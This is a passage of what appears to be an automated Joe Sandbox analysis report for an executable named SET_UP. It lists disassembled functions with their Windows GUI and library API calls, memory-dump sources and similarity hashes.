                                                                                                                                                                                                  Function 004BC5B1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004BC729: GetParent.USER32(00000001), ref: 004BC75C
                                                                                                                                                                                                    • Part of subcall function 004BC729: GetLastActivePopup.USER32(00000001), ref: 004BC76B
                                                                                                                                                                                                    • Part of subcall function 004BC729: IsWindowEnabled.USER32(00000001), ref: 004BC780
                                                                                                                                                                                                    • Part of subcall function 004BC729: EnableWindow.USER32(00000001,00000000), ref: 004BC793
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 004BC5E7
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 004BC655
                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00000000), ref: 004BC663
                                                                                                                                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 004BC67F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
                                                                                                                                                                                                  • String ID: ZuK
                                                                                                                                                                                                  • API String ID: 1958756768-757884895
                                                                                                                                                                                                  • Opcode ID: 2524a1cbecec9fef697faf39bdcf364b7581af3dc850b3b935e0e56f2befe174
                                                                                                                                                                                                  • Instruction ID: f1df70e2290fc2d2fe0d72604373d03f9904a955754873a767017330b1a7def4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2524a1cbecec9fef697faf39bdcf364b7581af3dc850b3b935e0e56f2befe174
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B821A272A00118AFDB209F99CCC5FEEB7B9EB44340F54052BE510E7290D7789D418BB4
                                                                                                                                                                                                  Function 004C1C27 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000362,0000E002,00000000), ref: 004C1C8D
                                                                                                                                                                                                  • UpdateWindow.USER32(?), ref: 004C1CA4
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004C1D0F
                                                                                                                                                                                                  • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 004C1D2B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$ParentPostSendUpdateWindow
                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                  • API String ID: 4141989945-2766056989
                                                                                                                                                                                                  • Opcode ID: 4c548786664895c572b44897fc2fd2c11b12efc75089fa024e3a3bcf79450b95
                                                                                                                                                                                                  • Instruction ID: 2231267e6badd0d97d184dec044adb1fc40352e711288d73e71231d7bc74193c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c548786664895c572b44897fc2fd2c11b12efc75089fa024e3a3bcf79450b95
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8731EF35640B01AFEB704F25CC08FAA77A5BF16310F11492EF95B562B2C7B8A801DB08
                                                                                                                                                                                                  Function 00401225 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004012B4: GetStockObject.GDI32(00000011), ref: 004012BD
                                                                                                                                                                                                    • Part of subcall function 004012B4: GetStockObject.GDI32(0000000D), ref: 004012C5
                                                                                                                                                                                                    • Part of subcall function 004012B4: GetObjectW.GDI32(00000000,0000005C,?), ref: 004012D5
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401248
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040125E
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040127B
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040129F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateFontIndirect$Object$Stock
                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                  • API String ID: 2458975687-2564639436
                                                                                                                                                                                                  • Opcode ID: 2f4853a599195851c53df997fc91c2c1399d35c4a64f642c7afdf37ff59aef04
                                                                                                                                                                                                  • Instruction ID: c1957a133e74b13259c21287822754b9258933da2d129373de141462a18b7cdf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f4853a599195851c53df997fc91c2c1399d35c4a64f642c7afdf37ff59aef04
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E112D72D00198AACB14EBF5C889ECEBF7CEF05314F00412BE515E6155DBB4B90ACBA0
                                                                                                                                                                                                  Function 0040122B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004012B4: GetStockObject.GDI32(00000011), ref: 004012BD
                                                                                                                                                                                                    • Part of subcall function 004012B4: GetStockObject.GDI32(0000000D), ref: 004012C5
                                                                                                                                                                                                    • Part of subcall function 004012B4: GetObjectW.GDI32(00000000,0000005C,?), ref: 004012D5
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401248
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040125E
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040127B
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040129F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateFontIndirect$Object$Stock
                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                  • API String ID: 2458975687-2564639436
                                                                                                                                                                                                  • Opcode ID: bb8162c3438da65ac484d1c100f7d1b1cb9428e64c68e3329cdb98b6b547188d
                                                                                                                                                                                                  • Instruction ID: 18f3d6789f81c3536959801a03654768a7ba9371a523a7b47540a0f8f6fd41c3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb8162c3438da65ac484d1c100f7d1b1cb9428e64c68e3329cdb98b6b547188d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C010072D001996ACB14EBF5CC45ECEBF7CAF04314F00412BA515E6155DB74B90ACBA1
                                                                                                                                                                                                  Function 004294EC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 46COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: 5.1$Auto$Mono$Stereo
                                                                                                                                                                                                  • API String ID: 3519838083-1523637749
                                                                                                                                                                                                  • Opcode ID: 88442daff2d2f7e35d07099bf95e43f3676171bffd4d87cfcb45086ee8b6e045
                                                                                                                                                                                                  • Instruction ID: dc4fde91dc6df69067ce0ec147e91ddfcaaa6cb3b19d339eeaf85b9c165f4930
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88442daff2d2f7e35d07099bf95e43f3676171bffd4d87cfcb45086ee8b6e045
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2018C32B1022AAADB15DF50E915BFEBB20EB00748F90441FB101661D1C7BC9F44C6AA
                                                                                                                                                                                                  Function 0041D66E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 0041D684
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041D68B
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 0041D69B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                                  • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                  • API String ID: 4190356694-3789238822
                                                                                                                                                                                                  • Opcode ID: 8e16ad8e87658a4128ae0511d4945800a0af0042ecb312f16b0c94ecd378ac50
                                                                                                                                                                                                  • Instruction ID: 4920beeff0e8558d0a7a79d320fe063b57acc6ea88f1543854f496f1c1019f55
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e16ad8e87658a4128ae0511d4945800a0af0042ecb312f16b0c94ecd378ac50
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFF0ECB1801348ABE7109FE5CC0DFDB7ABCEB80715F100466EA0993150D77CAA45C76C
                                                                                                                                                                                                  Function 004B9795 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,004BEC22,00000000), ref: 004B979E
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 004B97AC
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000078,?,?,004BEC22,00000000), ref: 004B97CE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                                                  • String ID: GDI32.DLL$SetLayout
                                                                                                                                                                                                  • API String ID: 4275029093-2147214759
                                                                                                                                                                                                  • Opcode ID: b17ccb1998005a001ec8a7e0797776bcdf7e8d5ad228dae999d86cb4b3ff7f58
                                                                                                                                                                                                  • Instruction ID: 4569b327b1de9b253b1bae91d10581cc726eb47ae83be5e5c3fc66d1ce635c3c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b17ccb1998005a001ec8a7e0797776bcdf7e8d5ad228dae999d86cb4b3ff7f58
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BE0D833244200EB83514B6ADC08C5B77D29FC47317298627F625C21E0CB785C01DB3A
                                                                                                                                                                                                  Function 004B975F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(GDI32.DLL,?,004BEC15), ref: 004B9767
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 004B9773
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 004B978B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                                                  • String ID: GDI32.DLL$GetLayout
                                                                                                                                                                                                  • API String ID: 4275029093-2396518106
                                                                                                                                                                                                  • Opcode ID: 10bd6f272b59420d7fda22498ec714549e17f8a456a3c20f072c93fd8e0acfd9
                                                                                                                                                                                                  • Instruction ID: 2b666a83fdd3e31ba76ab6a35594e2f9eccc2f9f6d38dc56f7b37313056d606b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10bd6f272b59420d7fda22498ec714549e17f8a456a3c20f072c93fd8e0acfd9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44D05B32A90260BBC6901FB6AC4DE5637D89B887A13154677FD75D32F0CF98AC10876D
                                                                                                                                                                                                  Function 00420B1E Relevance: 7.8, APIs: 5, Instructions: 347COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00422D5E: __EH_prolog.LIBCMT ref: 00422D63
                                                                                                                                                                                                    • Part of subcall function 00422D5E: GetWindowsDirectoryW.KERNEL32(00000000,000003FF,00000000), ref: 00422D95
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00420C35
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00420E3C
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00420EB1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountTick$DirectoryH_prologWindows
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1252548948-0
                                                                                                                                                                                                  • Opcode ID: a6982924a4d9023b55201cfa6eb8c83eede2db5bc81ff7c8274a0d691e883921
                                                                                                                                                                                                  • Instruction ID: 028382db0916aa3117959c83e4c65f2066e925ef336d84b980ba15c83567bcca
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6982924a4d9023b55201cfa6eb8c83eede2db5bc81ff7c8274a0d691e883921
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFB10630740714ABDB24DB65E886FAFB7E5EB54710F50491FF102AA2D2DBB9AD80C718
                                                                                                                                                                                                  Function 00414F2C Relevance: 7.7, APIs: 5, Instructions: 240COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00414F3D
                                                                                                                                                                                                    • Part of subcall function 004C0464: SetBkColor.GDI32(A5A5D47D,?), ref: 004C046E
                                                                                                                                                                                                    • Part of subcall function 004C0464: ExtTextOutW.GDI32(A5A5D47D,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004C0484
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00415185
                                                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00415193
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,?,?,?,00000000,?,?), ref: 004151D2
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000001,?,?,?,00000000), ref: 004151F0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$DrawImageList_$ClientColorCopyInflateText
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3242326373-0
                                                                                                                                                                                                  • Opcode ID: c1edc61998cf68dae7be395935dbadbd6ed438b8068eed510c755826df972806
                                                                                                                                                                                                  • Instruction ID: 9fe18e924ecfab3019283369625fd769021ddd88ec5f525f66a4d6a6e59466cb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1edc61998cf68dae7be395935dbadbd6ed438b8068eed510c755826df972806
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60915A31600B05EFDB24CEA9C984BEAB7F5FB88308F10891AE59697250D774F985CB54
                                                                                                                                                                                                  Function 00431921 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 004319D4
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,?,?,?,00000000,?), ref: 00431A79
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000001,?,-00000003,?,00000000), ref: 00431AA1
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00431AB0
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000003,?,?,?,00000000), ref: 00431B12
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
